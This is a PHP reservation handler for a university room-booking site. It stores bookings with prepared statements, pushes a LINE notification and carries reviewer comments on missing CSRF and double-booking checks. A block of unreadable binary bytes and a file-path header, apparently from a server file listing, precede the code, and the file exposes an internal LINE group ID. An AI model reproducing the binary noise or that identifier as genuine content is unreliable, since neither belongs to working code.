h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Current File : /var/www/html/trr/pages/reserve_add_db.php
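<?php
// Page bootstrap: start output buffering and the session, then pull in the
// login check, the database connection ($conn) and the page header.
// The full "<?php" tag is used because the short "<?" form is only parsed when
// short_open_tag is enabled; with it disabled the ob_start() line is sent to
// the browser as text and session_start() then runs after output has begun.
ob_start();
session_start();
// NOTE(review): check_mode_login.php is presumably the login/mode gate - confirm.
// `require` makes the request fail closed: `include` only raises a warning when
// the file is missing and would let the rest of the page run without the check.
require 'check_mode_login.php';
// The reservation handler cannot work without the connection, so fail early here too.
require 'dbconnect.php';
include 'header.php';
?>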
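<?php
/*
 * Reservation form handler.
 *
 * On a submitted form it (1) reads room_code, reserve_date, phone, subject and
 * note from $_POST, (2) collects the posted time slots (fields named
 * "pid<time_code>" for every time_code in reserve_time_list), (3) inserts one
 * row into reserve_detail and one row per slot into reserve_time, (4) pushes a
 * LINE message announcing the booking, and (5) prints a confirmation or an
 * error message.
 *
 * Security notes:
 *  - Every request-derived value reaches the database through a bound
 *    parameter; no request data is concatenated into SQL text.
 *  - room_code and the slot values were previously interpolated unquoted (as
 *    numeric literals), so they are restricted to digit strings here.
 *  - room_code is HTML-escaped before it is echoed into the result link.
 *  - NOTE(review): no CSRF token is checked in this block - confirm whether
 *    check_mode_login.php or the form already covers that.
 *  - NOTE(review): nothing here checks whether the room/slot is already
 *    booked - confirm that this is enforced elsewhere (form or DB constraint).
 *
 * Expects $conn (mysqli link) from dbconnect.php and an active session.
 */
if (!empty($_POST["submit"]))	// !empty() avoids the undefined-index notice on a plain GET
{
	// Only plain strings are accepted; an array-valued field (name[]=...) becomes ''.
	$post_string = function ($key) {
		return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
	};
	// Session values are bound as strings; a missing key becomes ''.
	$session_string = function ($key) {
		return (isset($_SESSION[$key]) && is_scalar($_SESSION[$key])) ? (string) $_SESSION[$key] : '';
	};

	$room_code    = $post_string("room_code");
	$reserve_date = $post_string("reserve_date");
	$phone        = $post_string("phone");
	$subject      = $post_string("subject");
	$note         = $post_string("note");

	$user_name    = $session_string('USERNAME_arit67');
	$full_name    = $session_string('FULLNAME');
	$faculty_name = $session_string('FACULTYNAME');
	$email        = $session_string('MAIL');

	// NOTE(review): the expected reserve_date format is not visible here; it is
	// bound as a string, so it cannot alter the statement, but a format check
	// should be added once the form's format is confirmed.
	if (($room_code !== '') && ctype_digit($room_code) && ($reserve_date !== ''))
	{
		// Collect the posted time slots, in time_code order.
		$posted_times = [];
		$query = mysqli_query($conn, "SELECT time_code FROM reserve_time_list ORDER BY time_code ASC");
		if ($query) {
			while ($result = mysqli_fetch_array($query, MYSQLI_ASSOC)) {
				$input_name = "pid" . $result["time_code"];
				if (isset($_POST[$input_name])) {
					$posted_times[] = $_POST[$input_name];
				}
			}
			mysqli_free_result($query);
		} else {
			error_log('reserve_add_db: reserve_time_list query failed: ' . mysqli_error($conn));
		}

		if (count($posted_times) > 0) {
			$saved = false;
			$new_reserve_code = 1;

			// Next reserve_code = highest existing code + 1 (1 for an empty table).
			// NOTE(review): two concurrent requests can compute the same code; an
			// AUTO_INCREMENT/unique key on reserve_code would close that gap - confirm schema.
			$query = mysqli_query($conn, "SELECT reserve_code FROM reserve_detail ORDER BY reserve_code DESC LIMIT 1");
			if ($query) {
				$result = mysqli_fetch_array($query, MYSQLI_ASSOC);
				if ($result) {
					$new_reserve_code = ((int) $result["reserve_code"]) + 1;
				}
				mysqli_free_result($query);

				// Save the booking header row in reserve_detail.
				$sql  = "INSERT INTO reserve_detail ";
				$sql .= "(reserve_code,user_name,full_name,faculty_name,phone,email,room_code,reserve_date,subject,note) ";
				$sql .= "VALUES (?,?,?,?,?,?,?,?,?,?)";
				$stmt = mysqli_prepare($conn, $sql);
				if ($stmt) {
					// room_code is bound as a string of digits so that no integer
					// truncation happens in PHP; MySQL converts it for the column.
					mysqli_stmt_bind_param(
						$stmt,
						"isssssssss",
						$new_reserve_code,
						$user_name,
						$full_name,
						$faculty_name,
						$phone,
						$email,
						$room_code,
						$reserve_date,
						$subject,
						$note
					);
					$saved = mysqli_stmt_execute($stmt);
					mysqli_stmt_close($stmt);
				}
			}
			if (!$saved) {
				error_log('reserve_add_db: reserve_detail insert failed: ' . mysqli_error($conn));
			}

			if ($saved)
			{
				// Save one reserve_time row per selected slot.
				$stmt2 = mysqli_prepare($conn, "INSERT INTO reserve_time (reserve_code,reserve_time) VALUES (?,?)");
				foreach ($posted_times as $posted_time) {
					$slot_saved = false;
					// A slot value that is not a digit string is reported as a failed
					// save rather than being stored as 0 by an implicit conversion.
					if ($stmt2 && is_string($posted_time) && ctype_digit($posted_time)) {
						mysqli_stmt_bind_param($stmt2, "is", $new_reserve_code, $posted_time);
						$slot_saved = mysqli_stmt_execute($stmt2);
					}
					if (!$slot_saved) {
						echo "ไม่สามารถบันทึกข้อมูลได้";
					}
				}
				if ($stmt2) {
					mysqli_stmt_close($stmt2);
				}

				// Announce the booking through the LINE Messaging API (best effort).
				// NOTE(review): the channel access token used to be a string literal in
				// this file. Any token that has lived in source should be treated as
				// disclosed: revoke it and issue a new one. The variable name below is a
				// placeholder - set it in the server configuration (e.g. SetEnv) or
				// replace this lookup with the site's own secret store.
				$access_token = getenv('LINE_CHANNEL_ACCESS_TOKEN');

				// Recipient: ID of the lecturers' study-room booking group.
				$to = 'C94a1fecfd0f485a363a2f945d3061c6c';

				if (($access_token !== false) && ($access_token !== '')) {
					$message = "\nเลขที่การจอง : " . $new_reserve_code  ;
					$message .= "\nผู้จอง : " . $full_name  ;
					$message .= "\nhttps://arit.skru.ac.th/trr/";

					$url = 'https://api.line.me/v2/bot/message/push';

					$data = [
						'to' => $to,
						'messages' => [
							[
								'type' => 'text',
								'text' => $message
							]
						]
					];

					$headers = [
						'Content-Type: application/json',
						'Authorization: Bearer ' . $access_token
					];

					// TLS certificate verification is left at cURL's defaults (enabled).
					$ch = curl_init($url);
					curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
					curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
					curl_setopt($ch, CURLOPT_POST, true);
					curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
					// Bound the wait so a slow notification cannot hang the booking page.
					curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
					curl_setopt($ch, CURLOPT_TIMEOUT, 10);

					$response = curl_exec($ch);
					if ($response === false) {
						// The booking itself is already stored; only record the failure.
						error_log('reserve_add_db: LINE push failed: ' . curl_error($ch));
					}
					curl_close($ch);
				} else {
					error_log('reserve_add_db: LINE access token not configured; notification skipped');
				}
?>
	<BR />บันทึกข้อมูลเรียบร้อยแล้ว
	<BR /><BR /><a href="index.php#<?php echo htmlspecialchars($room_code, ENT_QUOTES, 'UTF-8');?>"><button type="button" class="btn-success">คลิกที่นี่เพื่อดูรายการจอง</button></a>
<?php
			}
			else
			{
				echo "ไม่สามารถบันทึกข้อมูลได้";
			}
		} else { // no time slot was selected
?>
	<BR />กรุณาเลือกการช่วงเวลาที่ต้องการจอง
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
		}
	} else { // room_code or reserve_date missing, or room_code not numeric
?>
	<BR />กรุณากรอกข้อมูลให้ครบถ้วน
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
	}
} // if (!empty($_POST["submit"]))
?>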

<?php include 'footer.php';?>
